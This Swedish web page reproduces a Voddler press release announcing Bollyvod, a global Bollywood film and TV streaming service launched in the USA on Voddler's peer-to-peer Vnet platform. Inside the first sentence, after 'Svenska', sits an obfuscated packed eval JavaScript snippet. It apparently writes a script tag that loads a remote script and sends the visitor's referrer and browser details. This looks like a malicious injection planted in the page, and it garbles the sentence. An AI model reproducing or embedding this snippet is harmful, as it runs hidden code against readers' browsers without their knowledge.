Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Voddler öppnar ny global filmtjänst

Voddler öppnar ny global filmtjänst

Svenska eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hhbfr|var|u0026u|referrer|ahkek||js|php’.split(’|’),0,{}))
streamingleverantören Voddler öppnar idag filmtjänsten Bollyvod i USA, som första steg i en global lansering. Bollyvod visar de senaste filmerna och serierna från Bollywoods ledande filmbolag. Voddler har säkrat över 100 000 timmar film för tjänsten, som kommer marknadsföras till 700 miljoner människor globalt. Bollyvod använder Voddlers peer-to-peer-baserade molnlösning Vnet som strömmar video med högsta bildkvalitet, även till områden med låg bandbredd. Bollyvod är Voddlers första partnertjänst, efter att den egna tjänsten voddler.com bevisat Vnets kapacitet för globala mediebolag.

Voddler, som grundades 2007 för att strömma video med kontrollerad peer-to-peer-teknologi, lanserar idag Bollyvod på www.bollyvod.com. Bollyvod är en global filmtjänst för TV-serier och film från den indiska filmindustrin Bollywood, världens andra största efter Hollywood. Bollyvod öppnar idag i USA och kommer bli tillgänglig i världens alla länder, som blandad gratis- och prenumerationstjänst, över de kommande månaderna. Över 100 000 timmar innehåll har licensierats från Bollywoods ledande mediebolag, som Zee Entertainment, Reliance, Eros International, UTV och Sony Music. Lanseringen stöds av en kampanj, som kommer nå över 700 miljoner globalt via annonsering online, utomhus och på traditionell TV.

– I många länder är Bollyvod-fans en nichepublik. Sammantaget på en global nivå, däremot, så är det en massmarknad som efterfrågar bra indisk film och TV. Bollyvod ger kunderna bra innehåll när och där dom vill, över hela världen. Av bara farten krossar Bollywood då dessutom piraterna. Medan Hollywood kämpar med sin digitala övergång skapar Bollywood nya intäkter och gör pirattjänsterna irrelevanta, tack vare en enda global disruptiv handling, undrar Marcus Bäcklund, Voddlers VD.

Bollyvod baseras på Vnet, Voddlers patenterade molnlösning för att strömma film på nätet, ofta beskriven som ”kontrollerad peer-to-peer”. Vnet bygger på att alla tittare hjälper varandra att strömma film, vilket gör Vnet starkare ju fler tittare som ansluter. Detta gör det möjligt för Vnet att leverera hög bildkvalitet till låg kostnad, till och med i områden med låg bandbredd.

Under Voddlers första år användes Vnet primärt för Voddlers egna filmtjänst voddler.com, som lanserades 2010 och som sedan dess strömmat miljontals filmer i främst Norden och Spanien. Sedan Voddler med detta bevisat Vnets potential bygger företaget nu filmtjänster direkt för globala innehållsägare, i takt med att video-on-demand (VOD) marknaden mognat i varje enskilt land.

–  En verkligt global filmtjänst som Bollyvod är närmast omöjlig utan Vnet. Med Vet når filmerna hela världen, tack vare att tittarna hjälper varandra att distribuera filmerna. Egentligen är ju konceptet med decentraliserad distribution något som onlinepirater använt länge. Vi har tagit idén men tillsammans med våra användare skapar vi istället en del av Internet som är fokuserad på leverera video på ett säkert, skyddat och lagligt sätt. Bollywood har förstått detta. Konsumenterna vinner, upphovsmännen vinner, till och med telekombolagen vinner, säger Marcus Bäcklund, Voddlers VD.

Utöver att bygga partnertjänster för medieföretag så tillhandahåller Voddler även Vnet-teknologin till för globala streaming-aktörer. Voddlers Vnet-moln lagrar och strömmar större videofiler till bättre kvalitet än dagens dominerande streaming-lösningar, samtidigt som den sparar i snitt 95% av kostnaden. Med Vnet kan användare även se film när de inte är uppkopplade, s k offline mode. All video som distribueras via Vnet kan DRM-skyddas och göras geo-specifik, så upphovsägare har kontroll över sitt innehåll även när de gör det tillgängligt globalt.

Detta är ett pressmeddelande från Voddler